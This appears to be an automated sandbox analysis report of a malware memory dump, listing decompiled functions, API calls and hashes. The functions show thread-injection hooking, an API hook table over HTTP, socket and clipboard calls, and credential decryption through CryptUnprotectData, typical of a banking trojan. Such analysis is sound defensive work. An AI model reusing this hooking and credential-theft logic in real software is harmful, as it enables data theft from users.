Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: bindclosesocketlistensocket
String ID:
API String ID: 952684215-0
Opcode ID: 7bf398db5b36a079c17405aa6493f4fc5826d317daff90d150d2c74fdfc1f8e0
Instruction ID: 3bd642362b4a45eca11371647224929ce2bedc2991cbd4bc275d8ffd3f86f6df
Opcode Fuzzy Hash: 7bf398db5b36a079c17405aa6493f4fc5826d317daff90d150d2c74fdfc1f8e0
Instruction Fuzzy Hash: 9BF0A0322011017AE2211F39DC0DA6F39AAABC17B0B044729F866E61F0E73888C28528

Uniqueness

Uniqueness Score: -1.00%

Function 00412245, Relevance: 4.6, APIs: 3, Instructions: 62
nativethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00412245(void* __ecx, void* __edx, void* __esi, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, void* _a16, struct _EXCEPTION_RECORD _a20, CONTEXT* _a24, struct _PROCESS_PARAMETERS _a28, char _a32) {
				void _v28;
				long _v32;
				intOrPtr _v40;
				void* __edi;
				void* _t21;
				void* _t27;
				signed int _t30;
				void* _t34;
				void* _t35;
				void* _t38;
				void* _t40;
				void* _t42;

				_t42 = __esi;
				_t38 = __edx;
				_t35 = __ecx;
				_t21 = E004068C0();
				_t40 = _a16;
				if(_t21 != 0 && NtQueryInformationProcess(_t40, 0,  &_v28, 0x18,  &_v32) >= 0 && _v40 != 0 && (_v28 == 0 || E00417A96(_v28) == 0)) {
					_t34 = E004066F1(_t35, _t38, _v28);
					_t51 = _t34;
					if(_t34 != 0) {
						_t27 = E004067D5(_t35, _t40, _t42, _t51, _t34, 0);
						if(_t27 != 0) {
							_t30 = _t27 -  *0x422954 + E00406F49;
							if(( *0x422940 & 0x00000010) != 0) {
								_t30 = _t30 ^  *(_a24 + 0xb0);
							}
							 *(_a24 + 0xb0) = _t30;
						}
						CloseHandle(_t34);
					}
				}
				return NtCreateThread(_a4, _a8, _a12, _t40, _a20, _a24, _a28, _a32);
			}

0x00412245
0x00412245
0x00412245
0x00412250
0x00412255
0x0041225a
0x00412299
0x0041229b
0x0041229d
0x004122a2
0x004122a9
0x004122b1
0x004122bd
0x004122c2
0x004122c2
0x004122cb
0x004122cb
0x004122d2
0x004122d2
0x0041229d
0x004122f9

APIs

Part of subcall function 004068C0: WaitForSingleObject.KERNEL32(00000000,0041D437), ref: 004068C8

NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 0041226B
CloseHandle.KERNEL32(00000000,00000000,00000000,00000000), ref: 004122D2

Part of subcall function 00417A96: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00417AA3
Part of subcall function 00417A96: Thread32First.KERNEL32 ref: 00417ABE
Part of subcall function 00417A96: CloseHandle.KERNEL32(00000000), ref: 00417ADF

NtCreateThread.NTDLL(?,?,?,?,?,?,?,?), ref: 004122EE

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateHandle$FirstInformationObjectProcessQuerySingleSnapshotThreadThread32Toolhelp32Wait
String ID:
API String ID: 3154080929-0
Opcode ID: 31ce1dd6b7178b899c88e388dc009fc53f4911cc931f1d66334fc94b73740aa5
Instruction ID: d6612e2950bc0096cfb8227e5cf1b60d3893563ff2f58f63ccb2b4a81d6033e9
Opcode Fuzzy Hash: 31ce1dd6b7178b899c88e388dc009fc53f4911cc931f1d66334fc94b73740aa5
Instruction Fuzzy Hash: 7311A271200309ABDB119F50CD44BEF3BA9BF48304F04066AFD44A51E1D7B9D9B6DB1A

Uniqueness

Uniqueness Score: -1.00%

Function 00419841, Relevance: 4.5, APIs: 3, Instructions: 27networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000000,00000002,00000011), ref: 0041984A
bind.WS2_32(00000000,00000017,-0000001D), ref: 0041986A
closesocket.WS2_32(00000000), ref: 00419875

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: bindclosesocketsocket
String ID:
API String ID: 1873677229-0
Opcode ID: d7c9bb762e09e6f33cd7c81b7000c6d35edcca1af1ec6799c644f1cdb5d6a7ea
Instruction ID: 50f54785d9e9cd4598c800217dd09d28a49b5351715228102a43b2cea7cc6a3e
Opcode Fuzzy Hash: d7c9bb762e09e6f33cd7c81b7000c6d35edcca1af1ec6799c644f1cdb5d6a7ea
Instruction Fuzzy Hash: E7E0DF3220010076E2202B3EAD0EA6F25A99BC67B0B180724F872D71F2E738C8C28124

Uniqueness

Uniqueness Score: -1.00%

Function 00412C9A, Relevance: 3.2, APIs: 2, Instructions: 162
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00412C9A(void* __eax, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				signed int _v48;
				void* _v52;
				char _v56;
				char _v72;
				void* _v96;
				char _v196;
				void* __ebx;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t50;
				intOrPtr _t52;
				intOrPtr _t54;
				signed int _t65;
				void* _t66;
				void* _t68;
				char* _t70;
				intOrPtr _t77;
				signed int* _t82;
				intOrPtr _t95;
				void* _t97;
				signed int _t100;
				void* _t107;
				void* _t109;
				intOrPtr _t115;
				char* _t117;
				void* _t129;

				_t121 = __eflags;
				_t115 = _a4;
				_push(_t115);
				_t92 = __eax;
				_t48 = E00412C47(__eax, __eflags, 0x4c);
				_push(_t115);
				_v20 = _t48;
				_t50 = E00412C47(_t92, _t121, 0x4f);
				_push(_t115);
				_v24 = _t50;
				_t52 = E00412C47(_t92, _t121, 0x50);
				_push(_t115);
				_v28 = _t52;
				_t54 = E00412C47(_t92, _t121, 0x4d);
				_push(_t115);
				_v36 = _t54;
				_v12 = E00412C47(_t92, _t121, 0x4e);
				_v5 = _v20 != 0;
				if(_v5 != 0) {
					_t95 = _v12;
					_t65 = E00416F70(_t95);
					if(_t95 != 0 && _t65 > 1) {
						_t100 = _t65 & 0x80000001;
						if(_t100 < 0) {
							_t129 = (_t100 - 0x00000001 | 0xfffffffe) + 1;
						}
						if(_t129 == 0) {
							asm("cdq");
							_v48 = _t65 - _t107 >> 1;
							_t77 = E004163F1(_t65 - _t107 >> 1);
							_v44 = _t77;
							if(_t77 != 0) {
								if(E00416C5E(_v12, _t77) != 0) {
									_t82 =  &_v48;
									__imp__CryptUnprotectData(_t82, 0, _a8, 0, 0, 0,  &_v56);
									if(_t82 == 1) {
										_v16 = E004167DD(_v52);
										LocalFree(_v52);
									}
								}
								E00416421(_v44);
							}
						}
					}
					_t66 = 0x4b;
					E004159A4(_t66,  &_v196);
					_t117 =  &_v72;
					_t68 = 0x54;
					E004159A4(_t68, _t117);
					_t70 = 0x4036b4;
					_t109 =  ==  ? 0x4036b4 : _v16;
					_t97 =  ==  ? 0x4036b4 : _v36;
					_t135 = _v32;
					if(_v32 != 0) {
						_t70 = _t117;
					}
					_push(_t109);
					_push(_t97);
					_push(_t70);
					_push(_v20);
					E004171A2(_a12, E00416F70( *_a12),  *_a12, _t135,  &_v196, _a4);
					_t56 = E00416421(_v16);
				}
				E0041C9BD(E0041C9BD(E0041C9BD(E0041C9BD(E0041C9BD(_t56, _v20), _v24), _v28), _v36), _v12);
				return _v5;
			}

0x00412c9a
0x00412ca5
0x00412ca8
0x00412cab
0x00412cae
0x00412cb3
0x00412cb6
0x00412cba
0x00412cbf
0x00412cc2
0x00412cc6
0x00412ccb
0x00412cce
0x00412cd2
0x00412cd7
0x00412cda
0x00412ce8
0x00412ceb
0x00412cf2
0x00412d3e
0x00412d41
0x00412d48
0x00412d51
0x00412d57
0x00412d5d
0x00412d5d
0x00412d5e
0x00412d60
0x00412d65
0x00412d68
0x00412d6d
0x00412d72
0x00412d80
0x00412d8c
0x00412d91
0x00412d9a
0x00412daa
0x00412dad
0x00412dad
0x00412d9a
0x00412db6
0x00412db6
0x00412d72
0x00412d5e
0x00412dc3
0x00412dc4
0x00412dcb
0x00412dce
0x00412dcf
0x00412ddc
0x00412de1
0x00412de6
0x00412de9
0x00412dec
0x00412dee
0x00412dee
0x00412df0
0x00412df4
0x00412df7
0x00412df9
0x00412e0f
0x00412e1a
0x00412e1f
0x00412e43
0x00412e4e

APIs

CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,00000000,?), ref: 00412D91
LocalFree.KERNEL32(?,?,?,?), ref: 00412DAD

Part of subcall function 00416421: HeapFree.KERNEL32(00000000,00000000,00417C18,00000000,?,?,?,004060A9,00000000,00406583), ref: 00416434

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$CryptDataHeapLocalUnprotect
String ID:
API String ID: 2231100991-0
Opcode ID: 6e3b09b6c20f672fd660acc0adca1bdca9c6b6da13eaf4a00875a35b7012c7c6
Instruction ID: c054a54b54a6d90d6bc300701da38334cc33c06bf1b2db13ebf5a9cf321ad368
Opcode Fuzzy Hash: 6e3b09b6c20f672fd660acc0adca1bdca9c6b6da13eaf4a00875a35b7012c7c6
Instruction Fuzzy Hash: E8519E71E00219AADF10AFF5DE91AEEBB75EF44318F10442BF604F7251D6788991CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040745C, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0040745C(char* __esi) {
				void* _v40;
				short _v46;
				signed char _v48;
				struct _OSVERSIONINFOW _v324;
				void* _t13;
				int _t16;
				signed int _t20;
				short _t24;
				char* _t25;

				_t25 = __esi;
				E004164D4(_t13, __esi, 0, 6);
				_v324.dwOSVersionInfoSize = 0x11c;
				_t16 = GetVersionExW( &_v324);
				if(_t16 != 0) {
					__imp__GetNativeSystemInfo( &_v40);
					 *__esi = E00407386();
					if(_v48 > 0xff || _v46 != 0) {
						_t20 = 0;
					} else {
						_t20 = _v48 & 0x000000ff;
					}
					 *(_t25 + 1) = _t20;
					asm("sbb eax, eax");
					 *((short*)(_t25 + 2)) =  !0xffff & _v324.dwBuildNumber;
					_t24 = _v40;
					 *((short*)(_t25 + 4)) = _t24;
					return _t24;
				}
				return _t16;
			}

0x0040745c
0x0040746a
0x00407476
0x00407480
0x00407488
0x0040748e
0x00407499
0x004074a4
0x004074b3
0x004074ad
0x004074ad
0x004074ad
0x004074b5
0x004074c3
0x004074cd
0x004074d1
0x004074d5
0x00000000
0x004074d5
0x004074da

APIs

GetVersionExW.KERNEL32(?,?,00000000,00000006), ref: 00407480
GetNativeSystemInfo.KERNEL32(?), ref: 0040748E

Part of subcall function 00407386: GetVersionExW.KERNEL32(?,74B04EE0), ref: 004073A5

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Version$InfoNativeSystem
String ID:
API String ID: 2518960133-0
Opcode ID: e4fe75ed65bb1c34d3a690e9d664eb20c49ca4a26a7314133493b515d04e7619
Instruction ID: fac4558aa0888636ac7ccffb873d5e3a80fd072835e389f846cf024d48c216a8
Opcode Fuzzy Hash: e4fe75ed65bb1c34d3a690e9d664eb20c49ca4a26a7314133493b515d04e7619
Instruction Fuzzy Hash: 8E014435D052459ADB319FA5C9017DEB7F4AF08700F0044BAE555F2291E67CE984CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C056, Relevance: 1.5, APIs: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040C056(signed short* __eax, void* __ecx) {
				signed int _v8;
				void* __esi;
				signed int* _t7;
				void* _t8;
				signed short* _t9;
				signed int _t10;
				signed int _t13;
				signed short _t14;
				void* _t15;

				_t16 = __eax;
				_t7 =  &_v8;
				_v8 = 0x104;
				__imp__GetUserNameExW(2, __eax, _t7, _t15, __ecx);
				if(_t7 == 0) {
					L8:
					_t8 = 6;
					_t9 = E004159A4(_t8, _t16);
				} else {
					_t10 = _v8;
					if(_t10 == 0) {
						goto L8;
					} else {
						 *((short*)(__eax + _t10 * 2)) = 0;
						_t9 = __eax;
						if( *((intOrPtr*)(__eax)) != 0) {
							do {
								_t13 =  *_t9 & 0x0000ffff;
								if(_t13 == 0x2f || _t13 == 0x5c) {
									_t14 = 0x7c;
									 *_t9 = _t14;
								}
								_t9 =  &(_t9[1]);
							} while ( *_t9 != 0);
						}
					}
				}
				return _t9;
			}

0x0040c05b
0x0040c05d
0x0040c064
0x0040c06b
0x0040c073
0x0040c0a7
0x0040c0a9
0x0040c0aa
0x0040c075
0x0040c075
0x0040c07a
0x00000000
0x0040c07c
0x0040c07e
0x0040c082
0x0040c087
0x0040c089
0x0040c089
0x0040c08f
0x0040c098
0x0040c099
0x0040c099
0x0040c09c
0x0040c09f
0x0040c0a5
0x0040c087
0x0040c07a
0x0040c0b1

APIs

GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,0040C1AD,?,?,00000000), ref: 0040C06B

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 49448662f5cee08f435f2d32c3e6798251ee09afad8dc8958ab54f67f37ded3f
Instruction ID: 7e83087d8dbcc8e795a4edbfc31adb0d86264b2afadb28f648784f0ec73abedf
Opcode Fuzzy Hash: 49448662f5cee08f435f2d32c3e6798251ee09afad8dc8958ab54f67f37ded3f
Instruction Fuzzy Hash: C5F02461610200EADB346BA8C882BBB73E8EF45710F10016BF446EB2D0E6BD8D80C35D

Uniqueness

Uniqueness Score: -1.00%

Function 0041201E, Relevance: 1.5, APIs: 1, Instructions: 32
networkCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0041201E(char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr* _t8;
				intOrPtr _t10;
				intOrPtr _t12;

				_t8 = E004068C0();
				_t12 = _a8;
				if(_t8 == 0 || _t12 == 0) {
					L5:
					__imp__InternetReadFileExA(_a4, _t12, _a12, _a16);
					return _t8;
				}
				_t11 =  *((intOrPtr*)(_t12 + 0x14));
				if( *((intOrPtr*)(_t12 + 0x14)) == 0) {
					goto L5;
				}
				_t8 = _t12 + 0x18;
				_t10 =  *_t8;
				_t16 = _t10;
				if(_t10 == 0) {
					goto L5;
				}
				_t8 = E00411897(_t16,  &_a4, _t11, _t10, _t8);
				if(_t8 == 0xffffffff) {
					goto L5;
				}
				return _t8;
			}

0x00412022
0x00412027
0x0041202c
0x00412053
0x0041205d
0x00000000
0x0041205d
0x00412032
0x00412037
0x00000000
0x00000000
0x00412039
0x0041203c
0x0041203e
0x00412040
0x00000000
0x00000000
0x00412049
0x00412051
0x00000000
0x00000000
0x00412065

APIs

Part of subcall function 004068C0: WaitForSingleObject.KERNEL32(00000000,0041D437), ref: 004068C8

InternetReadFileExA.WININET(?,?,?,?), ref: 0041205D

Part of subcall function 00411897: EnterCriticalSection.KERNEL32(004230DC), ref: 004118A8
Part of subcall function 00411897: LeaveCriticalSection.KERNEL32(004230DC), ref: 00411A6B

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterFileInternetLeaveObjectReadSingleWait
String ID:
API String ID: 4141673382-0
Opcode ID: c151629cedfe721673f4592969990c3722af4ec08587117ed401869b71da25a4
Instruction ID: 584aace8322762d7bf798a7c032b6204f663464421d4264b0d88cf7831a16984
Opcode Fuzzy Hash: c151629cedfe721673f4592969990c3722af4ec08587117ed401869b71da25a4
Instruction Fuzzy Hash: 28F08231501209ABCF21AF51D900DEB3B69AE46760B04861ABA1597250C375E9A5C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 0041654B, Relevance: 1.5, APIs: 1, Instructions: 20
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041654B() {
				long _t7;
				signed int _t8;
				intOrPtr _t9;
				void* _t11;
				void* _t13;

				_t11 = _t13 - 0x78;
				_t7 = GetTimeZoneInformation(_t11 - 0x34);
				if(_t7 != 1) {
					if(_t7 != 2) {
						_t8 = 0;
					} else {
						_t9 =  *((intOrPtr*)(_t11 + 0x74));
						goto L4;
					}
				} else {
					_t9 =  *((intOrPtr*)(_t11 + 0x20));
					L4:
					_t8 = (_t9 +  *(_t11 - 0x34)) * 0xffffffc4;
				}
				return _t8;
			}

0x0041654c
0x0041655a
0x00416563
0x0041656d
0x0041657a
0x0041656f
0x0041656f
0x00000000
0x0041656f
0x00416565
0x00416565
0x00416572
0x00416575
0x00416575
0x00416580

APIs

GetTimeZoneInformation.KERNEL32(?), ref: 0041655A

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: InformationTimeZone
String ID:
API String ID: 565725191-0
Opcode ID: 1cbade870f55b3700e2d0feb74f2654927f07bd44c7d44675a4197fdf32d153d
Instruction ID: 2365bd53fbd5c19db837ec19cf014adb8651a0e6401fa952a326ae261bede667
Opcode Fuzzy Hash: 1cbade870f55b3700e2d0feb74f2654927f07bd44c7d44675a4197fdf32d153d
Instruction Fuzzy Hash: 85E08631A04108DBDB20DBA4FE459DD77F6E714308F610412E442E6154D228D9868A0A

Uniqueness

Uniqueness Score: -1.00%

Function 004098BE, Relevance: 1.4, Strings: 1, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E004098BE() {
				void* __ebx;
				intOrPtr _t1;
				intOrPtr _t2;
				signed int _t55;
				void* _t57;
				void* _t58;

				_t1 =  *0x422964;
				if(_t1 == 0) {
					_t1 =  *0x422960;
					 *0x422024 = E00412245;
				} else {
					 *0x422024 = E004122FC;
				}
				 *0x422020 = _t1;
				_t2 =  *0x422970; // 0x77e27840
				 *0x422030 = _t2;
				 *0x422040 = GetFileAttributesExW;
				 *0x422050 = HttpSendRequestW;
				 *0x422060 = HttpSendRequestA;
				 *0x422070 = HttpSendRequestExW;
				 *0x422080 = HttpSendRequestExA;
				 *0x422090 = InternetCloseHandle;
				 *0x4220a0 = InternetReadFile;
				 *0x4220b0 = __imp__InternetReadFileExA;
				 *0x4220c0 = InternetQueryDataAvailable;
				 *0x4220d0 = HttpQueryInfoA;
				 *0x4220e0 = __imp__#3;
				 *0x4220f0 = __imp__#19;
				 *0x422100 = __imp__WSASend;
				 *0x422110 = OpenInputDesktop;
				 *0x422120 = SwitchDesktop;
				 *0x422130 = DefWindowProcW;
				 *0x422140 = DefWindowProcA;
				 *0x422150 = DefDlgProcW;
				 *0x422160 = DefDlgProcA;
				 *0x422170 = DefFrameProcW;
				 *0x422180 = DefFrameProcA;
				 *0x422190 = DefMDIChildProcW;
				 *0x4221a0 = DefMDIChildProcA;
				 *0x4221b0 = CallWindowProcW;
				 *0x4221c0 = CallWindowProcA;
				 *0x4221d0 = RegisterClassW;
				 *0x4221e0 = RegisterClassA;
				 *0x4221f0 = RegisterClassExW;
				 *0x422200 = RegisterClassExA;
				 *0x422210 = BeginPaint;
				 *0x422220 = EndPaint;
				 *0x422230 = GetDCEx;
				 *0x422240 = GetDC;
				 *0x422250 = GetWindowDC;
				 *0x422260 = ReleaseDC;
				 *0x422270 = GetUpdateRect;
				 *0x422280 = GetUpdateRgn;
				 *0x422290 = GetMessagePos;
				 *0x4222a0 = GetCursorPos;
				 *0x4222b0 = SetCursorPos;
				 *0x4222c0 = SetCapture;
				 *0x4222d0 = ReleaseCapture;
				 *0x4222e0 = GetCapture;
				 *0x4222f0 = GetMessageW;
				 *0x422300 = GetMessageA;
				 *0x422310 = PeekMessageW;
				 *0x422320 = PeekMessageA;
				 *0x422330 = TranslateMessage;
				_push(0x422020);
				 *0x422340 = GetClipboardData;
				_t55 = 0x34;
				 *0x422350 = __imp__PFXImportCertStore;
				return E0040982D(_t55, _t57, _t58);
			}

0x004098be
0x004098c5
0x004098d3
0x004098d8
0x004098c7
0x004098c7
0x004098c7
0x004098e2
0x004098e7
0x004098ec
0x004098f6
0x00409900
0x0040990a
0x00409914
0x0040991e
0x00409928
0x00409932
0x0040993c
0x00409946
0x00409950
0x0040995a
0x00409964
0x0040996e
0x00409978
0x00409982
0x0040998c
0x00409996
0x004099a0
0x004099aa
0x004099b4
0x004099be
0x004099c8
0x004099d2
0x004099dc
0x004099e6
0x004099f0
0x004099fa
0x00409a04
0x00409a0e
0x00409a18
0x00409a22
0x00409a2c
0x00409a36
0x00409a40
0x00409a4a
0x00409a54
0x00409a5e
0x00409a68
0x00409a73
0x00409a7d
0x00409a87
0x00409a91
0x00409a9b
0x00409aa5
0x00409aaf
0x00409ab9
0x00409ac3
0x00409acd
0x00409ad7
0x00409adc
0x00409ae8
0x00409ae9
0x00409af4

Strings

@xw, xrefs: 004098E7

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: @xw
API String ID: 4275171209-2821512424
Opcode ID: 3d721b67e893173ae914b4e9d23c648a04975ec7ae3341ad47db7d82f726d3cd
Instruction ID: 5e99fbbc8a0100d12aca69e73175c33ca87e2bf8f5f0399f13bd19a989f0eb0a
Opcode Fuzzy Hash: 3d721b67e893173ae914b4e9d23c648a04975ec7ae3341ad47db7d82f726d3cd
Instruction Fuzzy Hash: C261B8B8A00205EFD3A5CF68EF80A107BE1B34C354380427AE919E7731E7B5A956CB1C

Uniqueness

Uniqueness Score: -1.00%

Function 004175D2, Relevance: 1.3, Strings: 1, Instructions: 70
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E004175D2() {
				signed int _t23;
				signed int _t59;
				signed int* _t63;
				signed int _t64;

				_t23 =  *0x423f3c;
				if(_t23 >= 0x270) {
					_t64 = 0;
					do {
						_t59 = _t64;
						_t64 = _t64 + 1;
						0x423570[_t59] = (( *(0x423574 + _t59 * 4) ^ 0x423570[_t59]) & 0x7fffffff ^ 0x423570[_t59]) >> 0x00000001 ^  *(0x4223a0 + ((( *(0x423574 + _t59 * 4) ^ 0x423570[_t59]) & 0x7fffffff ^ 0x423570[_t59]) & 0x00000001) * 4) ^  *(0x423ba4 + _t59 * 4);
					} while (_t64 < 0xe3);
					if(_t64 < 0x26f) {
						_t63 =  &(0x423570[_t64]);
						do {
							 *_t63 =  *(0x4223a0 + ((( *_t63 ^ _t63[1]) & 0x7fffffff ^  *_t63) & 0x00000001) * 4) ^  *(_t63 - 0x38c) ^ (( *_t63 ^ _t63[1]) & 0x7fffffff ^  *_t63) >> 0x00000001;
							_t63 =  &(_t63[1]);
						} while (_t63 < 0x423f2c);
					}
					 *0x423f2c = (( *0x423570 ^  *0x423f2c) & 0x7fffffff ^  *0x423f2c) >> 0x00000001 ^  *(0x4223a0 + ((( *0x423570 ^  *0x423f2c) & 0x7fffffff ^  *0x423f2c) & 0x00000001) * 4) ^  *0x423ba0;
					_t23 = 0;
				}
				 *0x423f3c = _t23 + 1;
				return (0x423570[_t23] ^ 0x423570[_t23] >> 0x0000000b ^ ((0x423570[_t23] ^ 0x423570[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x423570[_t23] ^ 0x423570[_t23] >> 0x0000000b ^ ((0x423570[_t23] ^ 0x423570[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f) >> 0x00000012 ^ 0x423570[_t23] ^ 0x423570[_t23] >> 0x0000000b ^ ((0x423570[_t23] ^ 0x423570[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x423570[_t23] ^ 0x423570[_t23] >> 0x0000000b ^ ((0x423570[_t23] ^ 0x423570[_t23] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f;
			}

0x004175d2
0x004175dc
0x004175e4
0x004175eb
0x004175eb
0x00417619
0x0041761a
0x00417621
0x0041762f
0x00417631
0x00417638
0x00417657
0x00417659
0x0041765c
0x00417638
0x0041768b
0x00417690
0x00417690
0x0041769a
0x004176c5

Strings

,?B, xrefs: 0041765C

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: ,?B
API String ID: 0-236612630
Opcode ID: 6e7ed6086db159d592b1e687204cfc3c8707564ea43853b1faf2714dc84b2c69
Instruction ID: a12bba72c267ff3691ff412c9d742f4edfeb63e5ad7961b672c2d0960eebf0bf
Opcode Fuzzy Hash: 6e7ed6086db159d592b1e687204cfc3c8707564ea43853b1faf2714dc84b2c69
Instruction Fuzzy Hash: 5C216A327204009BD728DF3DEC55A4537F2E78931539A847DD519C32A0EA3DEA438B4C

Uniqueness

Uniqueness Score: -1.00%

Function 004021F3, Relevance: .2, Instructions: 236
COMMONCrypto

Download Yara Rule

C-Code - Quality: 77%

			E004021F3(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr* __esi, void* __fp0) {
				intOrPtr* _t95;
				void* _t96;
				void* _t98;
				intOrPtr* _t100;
				void* _t102;
				intOrPtr* _t104;
				signed char _t111;
				signed char _t112;
				signed char _t113;
				signed char _t114;
				signed char _t127;
				signed char _t128;
				signed char _t132;
				signed char _t133;
				void* _t165;
				void* _t168;
				intOrPtr* _t169;
				void* _t170;
				void* _t171;
				intOrPtr* _t172;
				intOrPtr* _t187;
				intOrPtr* _t188;
				void* _t189;
				intOrPtr* _t191;
				signed char _t195;
				intOrPtr* _t205;
				signed char _t213;
				signed char _t217;
				intOrPtr* _t224;
				intOrPtr* _t225;
				void* _t226;
				intOrPtr* _t229;
				void* _t230;
				intOrPtr* _t232;
				intOrPtr* _t233;
				void* _t236;
				intOrPtr* _t237;
				void* _t239;
				void* _t241;
				void* _t242;
				void* _t243;
				void* _t245;
				void* _t246;
				void* _t249;
				void* _t251;
				void* _t252;
				void* _t253;
				void* _t254;

				_t232 = __esi;
				_t168 = __ebx;
				_t205 = __edx + __ecx;
				 *__eax =  *__eax + __ebx;
				_t253 = _t252 + __ecx;
				 *_t205 =  *_t205 + __ebx;
				 *__esi =  *__esi + __ecx;
				_t95 = __eax + _t205;
				 *_t95 =  *_t95 + _t205;
				 *((intOrPtr*)(__ebx + 1)) =  *((intOrPtr*)(__ebx + 1)) + _t95;
				asm("rol byte [ecx], cl");
				_t224 = __edi + __ecx + 1;
				_t242 = _t241 + _t205;
				 *((intOrPtr*)(_t95 + 1)) =  *((intOrPtr*)(_t95 + 1)) + _t205;
				_pop(_t96);
				_t187 = __ecx + _t205 + __ebx;
				_t5 = __esi + 1;
				 *_t5 =  *((intOrPtr*)(__esi + 1)) + _t242;
				asm("fild dword [ecx]");
				if( *_t5 >= 0) {
					asm("fiadd word [ecx]");
				}
				 *((intOrPtr*)(_t205 + 1)) =  *((intOrPtr*)(_t205 + 1)) + _t253;
				asm("loopne 0x3");
				_push(_t242);
				_t169 = _t168 + _t253;
				 *_t169 =  *_t169 + _t96;
